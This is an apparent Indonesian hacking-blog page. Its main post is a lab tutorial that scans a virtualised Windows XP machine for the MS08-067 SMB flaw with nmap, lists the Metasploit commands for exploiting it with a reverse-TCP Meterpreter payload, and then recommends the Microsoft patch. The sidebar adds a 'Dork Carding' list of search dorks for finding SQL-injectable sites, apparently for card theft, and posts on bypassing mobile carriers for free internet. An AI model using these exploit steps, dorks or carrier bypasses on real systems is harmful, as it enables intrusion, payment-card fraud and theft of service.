Skip to main content

SMB Scanning Vulnerability By Binus Hacker

Terima Kasih BinusHacker telah memberikan kesempatan menulis disini dan ini adalah tulisan saya yang pertama kali di binushacker. Langsung saja, berdasarkan pengalaman saya, setelah install Windows XP, saya kira aman – aman saja dan ternyata di website resmi microsoft menyebutkan vulnerability pada netapi32.dll / ms08_067. Vulnerability ini ditemukan pada tahun 2008 di CVE-2008-4250. An attacker could exploit this vulnerability without authentication to run arbitrary code. It is possible that this vulnerability could be used in the crafting of a wormable exploit inilah yang disebutkan di situs Microsoft. Saya akan memberikan step by step untuk mengidentifikasi vulnerability netapi32.dll dan patching system :
Skenario
Attacker     : Ubuntu 10.04
Target        : Windows XP SP 2 Di Virtualbox
1. Download Nmap
Ketik ini pada konsole terminal
sudo su apt-get install nmap

2. Untuk melakukan analisa pada window, saya membuat sebuah code sederhana dari Perl dan memanfaatkan perintah nmap. Kita tidak perlu install Perl di ubuntu karena default Perl sudah terinstall. Copas kode berikut di gedit dan save dengan nama smb_scan.pl :
Meskipun tanpa code script Perl tersebut kita bisa mengetikkan perintah ini pada terminal konsole
nmap –script smb-check-vulns.nse -p445 <target>
Kenapa saya mengemasnya kedalam Perl, soalnya saya sendiri sering lupa sama perintah nmap. Maka alternatifnya adalah dengan membuat code sederhana tersebut. hehehehe..

3. Jalankan Code Tersebut
Proses scanning sudah selesai, saatnya membuka laporan scanning.
Inilah contoh isi dari hasil.txt
hasil.txt
Lihatlah pada line 10
MS08-067: VULNERABLE
Ternyata target memiliki vulnerability ms08_067, dengan memanfaatkan vulnerability tersebut kita bisa melakukan remote system Windows dengan memakai Metasploit
4. Proses Exploit Metasploit Untuk Mendapatkan System Target
DOWNLOAD METASPLOIT

Download Metasploit

msf
Keterangan:
search ms08_067                             : Pencarian vulnerability ms08_067 berdasarkan data Metasploit
use exploit/windows/smb/ms08_067_netapi : Metode pilihan exploit setelah proses search
set payload windows/meterpreter/reverse_tcp : Payload metasploit, untuk memilih payload “show payloads”
set LHOST                                   : IP Penyerang
set RHOST                                   : IP Target
5. Patching Vulnerability Pada MS08_067 Di Windows
Jangan biarkan Windows kita memiliki vulnerability ms08_067, sangat membahayakan jika ada seorang attacker mengambil alih system32, data pribadi kita bisa saja di hapus, memasang keyloger untuk mencuri informasi, memasang backdoor, mengerikan sekali.
Untuk patching silahkan download dan install dari situs resmi Microsoft
patch ms08_067
Download SMB Scanner Vulnerability
http://pastebin.com/Qdxyra2n
Referensi :
CVE-2008-4250

Comments

Popular posts from this blog

Dord Carding 2014

inurl:"id=" & intext:"Warning: mysql_fetch_assoc() inurl:trainers.php?id= inurl:buy.php?category= inurl:article.php?ID= inurl:play_old.php?id= inurl:declaration_more.php?decl_id= inurl:pageid= inurl:games.php?id= inurl:page.php?file= inurl:newsDetail.php?id= inurl:gallery.php?id= inurl:show.php?id= inurl:staff_id= inurl:newsitem.php?num= inurl:readnews.php?id= inurl:top10.php?cat= inurl:historialeer.php?num= inurl:reagir.php?num= inurl:Stray-Questions-View.php?num= inurl:forum_bds.php?num= inurl:game.php?id= inurl:view_product.php?id= inurl:newsone.php?id= inurl:sw_comment.php?id= inurl:news.php?id= inurl:avd_start.php?avd= inurl:event.php?id= inurl:product-item.php?id= inurl:sql.php?id= inurl:news_view.php?id= inurl:select_biblio.php?id= inurl:humor.php?id= inurl:aboutbook.php?id= inurl:ogl_inet.php?ogl_id= inurl:fiche_spectacle.php?id= inurl:communique_detail.php?id= inurl:sem.php3?id= inurl:kategorie.php4?id= inurl:faq2.php?id= inurl:show_an.php?id= inurl:preview....

[Update 06-09-2016] Config open vpn sc three jabar only.

Assalamualaikum gan/sist kali ini saya akan share config open vpn update dari postingan sebelumnya. ga usah banya tanya lah langsung aja ini bukti konek. terus tanpa saweran juga pokonya tanpa pulsa tanpa kuota. hehehe Dan bukti kedua  Langsung saja saya kasih bahan sama Triknya untuk gratisan. Aplikasi Open Vpn Client Ambil Di Sini [Download]. Config Open Vpnya Ambil Di Sini [Download]. Tentunya Hp Android :v Jangan lupa sambil ngopi Jangan lupa juga mandi dulu :D Dan dua bahan tersebut harus di download soalnya kalo tanpa itu ga akan bisa gratisa. Ya segitu saja dari saya, semoga gratisanya di pergunakan dengan baik :D NOTE: Jika ada yang bingung atau mau bertanya silahkan hubungi saya via Facebook Thanks Wasalam.

Cara Memakai SSH + Injek Di Pc (VIDEO)

Asslamualaikum Wrwb. Nah berhubung banyak yang request cara memakai ssh dan injek, Jadi malam ini saya akan share cara memakai ssh dan injek di pc, dalam bentuk video supaya mempermudah bagi para pemula. Nah apa sih ssh itu? Munggkin kebanyakan orang ssh adalah untuk berinternet gratis . Dan ini menurut ( Wikipedia) . Dan apa sih kegunaan injek itu. Bagi saya injek adalah tool pendorong untuk internet gratis dan pendorong ssh. Sudah cukup jelas? Dan ini adalah bahan bahan yang di butukan sebelum memulai tutorial. Bitvise Download Proxyfier Download Injek Download   Akun SSH *Bila Ingin Akun Premium Silahkan Order Ke Admin Via Facebook Dan Ini Sedikit Penampakan Tutorianya. Dan bila semua bahan sudah di download next sekarang download video tutorialnya. Tutorial Download Di Sini  Dan sekian dari saya semoga membantu anda. Mohon maaf bila ada kesalahan. Dan bila ada masalah dengan ini silahkan kontak admin atau berkomentar dengan sopan. Terima...